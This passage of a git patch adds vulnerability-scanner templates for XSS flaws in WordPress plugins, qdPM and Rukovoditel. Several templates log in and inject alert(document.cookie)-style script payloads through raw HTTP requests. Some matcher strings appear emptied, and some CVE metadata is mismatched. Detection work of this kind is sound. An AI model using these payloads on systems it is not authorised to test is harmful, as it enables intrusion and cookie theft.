From 332e19282ed450cc6827f71b22a4231403e415c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:08:49 +0530 Subject: [PATCH 1/7] templates added --- cves/2022/CVE-2022-4295.yaml | 34 +++++ cves/2023/CVE-2023-36346.yaml | 42 ++++++ http/cves/2019/CVE-2019-14789.yaml | 42 ++++++ http/cves/2019/CVE-2019-8390.yaml | 70 +++++++++ http/cves/2020/CVE-2020-19515.yaml | 44 ++++++ http/cves/2020/CVE-2020-35984.yaml | 60 ++++++++ http/cves/2020/CVE-2020-35985.yaml | 59 ++++++++ http/cves/2020/CVE-2020-35986.yaml | 60 ++++++++ http/cves/2020/CVE-2020-35987.yaml | 59 ++++++++ http/cves/2022/CVE-2022-43164.yaml | 61 ++++++++ http/cves/2022/CVE-2022-43165.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43166.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43167.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43169.yaml | 59 ++++++++ http/cves/2022/CVE-2022-43170.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43185.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44944.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44946.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44947.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44948.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44949.yaml | 128 ++++++++++++++++ http/cves/2022/CVE-2022-44950.yaml | 128 ++++++++++++++++ http/cves/2022/CVE-2022-44951.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44952.yaml | 142 ++++++++++++++++++ http/cves/2023/CVE-2023-0514.yaml | 46 ++++++ http/cves/2023/CVE-2023-1730.yaml | 36 +++++ http/cves/2023/CVE-2023-1835.yaml | 43 ++++++ http/cves/2023/CVE-2023-1890.yaml | 44 ++++++ http/cves/2023/CVE-2023-2023.yaml | 44 ++++++ http/cves/2023/CVE-2023-2252.yaml | 42 ++++++ http/cves/2023/CVE-2023-2272.yaml | 46 ++++++ http/cves/2023/CVE-2023-30256.yaml | 44 ++++++ http/cves/2023/CVE-2023-30777.yaml | 44 ++++++ http/cves/2023/CVE-2023-36287.yaml | 47 ++++++ http/cves/2023/CVE-2023-36289.yaml | 50 ++++++ http/exposed-panels/qdpm-login-panel.yaml | 35 +++++ .../wordpress/contus-video-gallery-sqli.yaml | 44 ++++++ .../leaguemanager-sql-injection.yaml | 30 ++++ .../wordpress/notificationx-sqli.yaml | 43 ++++++ .../wordpress/zero-spam-sql-injection.yaml | 32 ++++ 40 files changed, 2258 insertions(+) create mode 100644 cves/2022/CVE-2022-4295.yaml create mode 100644 cves/2023/CVE-2023-36346.yaml create mode 100644 http/cves/2019/CVE-2019-14789.yaml create mode 100644 http/cves/2019/CVE-2019-8390.yaml create mode 100644 http/cves/2020/CVE-2020-19515.yaml create mode 100644 http/cves/2020/CVE-2020-35984.yaml create mode 100644 http/cves/2020/CVE-2020-35985.yaml create mode 100644 http/cves/2020/CVE-2020-35986.yaml create mode 100644 http/cves/2020/CVE-2020-35987.yaml create mode 100644 http/cves/2022/CVE-2022-43164.yaml create mode 100644 http/cves/2022/CVE-2022-43165.yaml create mode 100644 http/cves/2022/CVE-2022-43166.yaml create mode 100644 http/cves/2022/CVE-2022-43167.yaml create mode 100644 http/cves/2022/CVE-2022-43169.yaml create mode 100644 http/cves/2022/CVE-2022-43170.yaml create mode 100644 http/cves/2022/CVE-2022-43185.yaml create mode 100644 http/cves/2022/CVE-2022-44944.yaml create mode 100644 http/cves/2022/CVE-2022-44946.yaml create mode 100644 http/cves/2022/CVE-2022-44947.yaml create mode 100644 http/cves/2022/CVE-2022-44948.yaml create mode 100644 http/cves/2022/CVE-2022-44949.yaml create mode 100644 http/cves/2022/CVE-2022-44950.yaml create mode 100644 http/cves/2022/CVE-2022-44951.yaml create mode 100644 http/cves/2022/CVE-2022-44952.yaml create mode 100644 http/cves/2023/CVE-2023-0514.yaml create mode 100644 http/cves/2023/CVE-2023-1730.yaml create mode 100644 http/cves/2023/CVE-2023-1835.yaml create mode 100644 http/cves/2023/CVE-2023-1890.yaml create mode 100644 http/cves/2023/CVE-2023-2023.yaml create mode 100644 http/cves/2023/CVE-2023-2252.yaml create mode 100644 http/cves/2023/CVE-2023-2272.yaml create mode 100644 http/cves/2023/CVE-2023-30256.yaml create mode 100644 http/cves/2023/CVE-2023-30777.yaml create mode 100644 http/cves/2023/CVE-2023-36287.yaml create mode 100644 http/cves/2023/CVE-2023-36289.yaml create mode 100644 http/exposed-panels/qdpm-login-panel.yaml create mode 100644 http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml create mode 100644 http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml create mode 100644 http/vulnerabilities/wordpress/notificationx-sqli.yaml create mode 100644 http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml diff --git a/cves/2022/CVE-2022-4295.yaml b/cves/2022/CVE-2022-4295.yaml new file mode 100644 index 0000000000..ccecc02849 --- /dev/null +++ b/cves/2022/CVE-2022-4295.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-4295 + +info: + name: Show all comments < 7.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 + - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4295 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Select ")' + condition: and diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml new file mode 100644 index 0000000000..2df196adc2 --- /dev/null +++ b/cves/2023/CVE-2023-36346.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-36346 + +info: + name: POS Codekop v2.0 - Cross-site Scripting (Reflected) + author: r3Y3r53 + severity: medium + description: | + POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + reference: + - https://yuyudhn.github.io/pos-codekop-vulnerability/ + - https://www.youtube.com/watch?v=bbbA-q1syrA + - https://nvd.nist.gov/vuln/detail/CVE-2023-36346 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,pos,codekop,unauthenticated + +requests: + - method: GET + path: + - "{{BaseURL}}/print.php?nm_member=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml new file mode 100644 index 0000000000..fa9427a85d --- /dev/null +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -0,0 +1,42 @@ +id: CVE-2019-14789 + +info: + name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-14789 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14789 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml new file mode 100644 index 0000000000..51c9b057d1 --- /dev/null +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -0,0 +1,70 @@ +id: CVE-2019-8390 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + reference: + - https://www.exploit-db.com/exploits/46399/ + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-8390 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + max-request: 3 + tags: cve,cve2019,xss,qdpm,authenticated,edb + +http: + - raw: + - | + GET /index.php/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= + + - | + POST /index.php/users HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + search[keywords]=e">&search_by_extrafields[]=9 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'alert alert-info alert-search-result' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="login\[_csrf_token\]" value="(.*?)"' + internal: true diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml new file mode 100644 index 0000000000..ad8ee4f768 --- /dev/null +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-19515 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + reference: + - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19515 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2020,xss,qdpm,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php?step=database_config&db_error=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'qdPM' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml new file mode 100644 index 0000000000..9683b3b423 --- /dev/null +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-35984 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35984 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35984 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml new file mode 100644 index 0000000000..6422b35447 --- /dev/null +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-35985 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35985 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml new file mode 100644 index 0000000000..60ffd46e2a --- /dev/null +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-35986 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35986 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml new file mode 100644 index 0000000000..14e50a21e4 --- /dev/null +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-35987 + +info: + name: Rukovoditel <= 2.7.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35987 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml new file mode 100644 index 0000000000..8afb4901bd --- /dev/null +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-43164 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43164 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43164 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml new file mode 100644 index 0000000000..f316ac4f11 --- /dev/null +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43165 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + reference: + - https://github.com/anhdq201/rukovoditel/issues/5 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43165 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml new file mode 100644 index 0000000000..8712f72c85 --- /dev/null +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43166 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + reference: + - https://github.com/anhdq201/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43166 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43166 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml new file mode 100644 index 0000000000..36d78662c1 --- /dev/null +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43167 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/7 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43167 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml new file mode 100644 index 0000000000..b45ddcd568 --- /dev/null +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43169 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + reference: + - https://github.com/anhdq201/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43169 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43169 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml new file mode 100644 index 0000000000..3e45934dcf --- /dev/null +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43170 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + reference: + - https://github.com/anhdq201/rukovoditel/issues/6 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43170 + classification: + cvss-metrics: 